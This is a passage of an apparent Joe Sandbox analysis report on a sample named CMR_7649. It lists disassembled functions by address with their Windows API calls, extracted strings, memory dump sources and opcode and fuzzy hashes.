                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                Function 03EDE2B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 03EDE2C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 6c63dfe697d2c20f6e870400f2dfab799cdbcd8ee6d05acc4d211d73035cff9c
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: F3E0E67494010DDFDB00EFB8D54D69E7FF4EF04301F1002A1FD01D2280D6309D508A62

                                                Non-executed Functions

                                                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                • SendMessageW.USER32 ref: 0047CA7F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                • ImageList_SetDragCursorImage.COMCTL32(00AFD7D8,00000000,00000000,00000000), ref: 0047CB9B
                                                • ImageList_BeginDrag.COMCTL32(00AFD7D8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                • SendMessageW.USER32 ref: 0047CD12
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                • SendMessageW.USER32 ref: 0047CD80
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                • SendMessageW.USER32 ref: 0047CE93
                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01B20,00000000,?,?,?,?), ref: 0047CF1C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                • SendMessageW.USER32 ref: 0047CF6B
                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01B20,00000000,?,?,?,?), ref: 0047CFE6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3100379633-4164748364
                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00434420
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                • IsIconic.USER32(?), ref: 0043444F
                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 2889586943-2988720461
                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                • _wcslen.LIBCMT ref: 00446498
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                • String ID: $@OH$default$winsta0
                                                • API String ID: 3324942560-3791954436
                                                • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • _wcscat.LIBCMT ref: 0044BD94
                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                • _wcscat.LIBCMT ref: 0044BE83
                                                • _wcscat.LIBCMT ref: 0044BE95
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2188072990-1173974218
                                                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                • __swprintf.LIBCMT ref: 004789D3
                                                • __swprintf.LIBCMT ref: 00478A1D
                                                • __swprintf.LIBCMT ref: 00478A4B
                                                • __swprintf.LIBCMT ref: 00478A79
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                • __swprintf.LIBCMT ref: 00478AA7
                                                • __swprintf.LIBCMT ref: 00478AD5
                                                • __swprintf.LIBCMT ref: 00478B03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 999945258-2428617273
                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                • __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscpy.LIBCMT ref: 004034A7
                                                • _wcscat.LIBCMT ref: 004034BC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                • _wcscpy.LIBCMT ref: 004035A0
                                                • _wcslen.LIBCMT ref: 00403623
                                                • _wcslen.LIBCMT ref: 0040367D
                                                Strings
                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                • _, xrefs: 0040371C
                                                • Unterminated string, xrefs: 00428348
                                                • Error opening the file, xrefs: 00428231
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                • API String ID: 3393021363-188983378
                                                • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                • __swprintf.LIBCMT ref: 00431C2E
                                                • _wcslen.LIBCMT ref: 00431C3A
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2192556992-3457252023
                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                • __swprintf.LIBCMT ref: 004722B9
                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
